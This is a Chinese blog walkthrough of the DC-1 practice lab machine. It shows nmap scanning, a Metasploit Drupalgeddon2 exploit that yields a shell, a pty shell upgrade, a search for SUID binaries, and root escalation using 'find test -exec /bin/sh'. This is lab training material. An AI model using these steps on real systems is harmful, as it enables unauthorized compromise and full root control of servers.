美文网首页框架建设收集渗透攻防实战
DC-1渗透实战(find提权初探)

DC-1渗透实战(find提权初探)

作者: 城市烈人 | 来源:发表于2019-04-17 10:59 被阅读153次

    靶机的难度不大,但首次接触到find提权,新技能get!!!

    靶机IP:192.168.8.156

    namp全扫

    nmap -sS -Pn -A -p- -n 192.168.8.156
    
    image.png

    WEB服务是drupal建站,还有一个111端口的 RPC服务

    image.png

    msf getshell

    80web的drupal站点,可以先探测一下是否存在漏洞

    image.png

    找个最新的试试

    use exploit/unix/webapp/drupal_drupalgeddon2
    set RHOSTS 192.168.8.156
    

    哇塞,直接拿下session

    image.png

    切成交互式的shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    find提权

    进入靶机的home目录下有个flag4目录,里面的flag4有提示

    image.png
    Can you use this same method to find or access the flag in root?
    
    Probably. But perhaps it's not that easy.  Or maybe it is?
    

    提权没思路,不妨查找一下靶机的可执行的二进制文件

    find / -perm -4000 2> /dev/null
    
    image.png

    find提权?是第一次使用,看下国外大黑的博文才知道的

    国内总有几个人喜欢翻译国外大黑牛的教程然后去赚取稿费,一点原创精神都没有,既然使用别人的知识,就别再去骗稿费了

    国外教程如下图:

    image.png

    自己来实践一下:

    在靶机的可写目录tmp下touch新建一个test文件

    touch test
    
    image.png

    用find命令检查是否以root用户身份执行命令

    find test -exec "whoami" \;
    

    发现是以root用户执行

    再使用find命令执行“/ bin / bash”

    find test -exec "/bin/sh" \;
    
    image.png

    拿到了root的shell

    进入root目录下get flag

    image.png

    总结

    1、遇到drupal等CMS建站,建议大家直接先去试试最近的漏洞exp

    2、拿到shell后,提权一直是我的弱项,该靶机很好地让我学到了find提权这个新技能

    靶机百度云下载
    链接:https://pan.baidu.com/s/1j7cWdCxVGdibDfql3os05A
    提取码:9a21

    相关文章

      网友评论

        本文标题:DC-1渗透实战(find提权初探)

        本文链接:https://www.haomeiwen.com/subject/lxugwqtx.html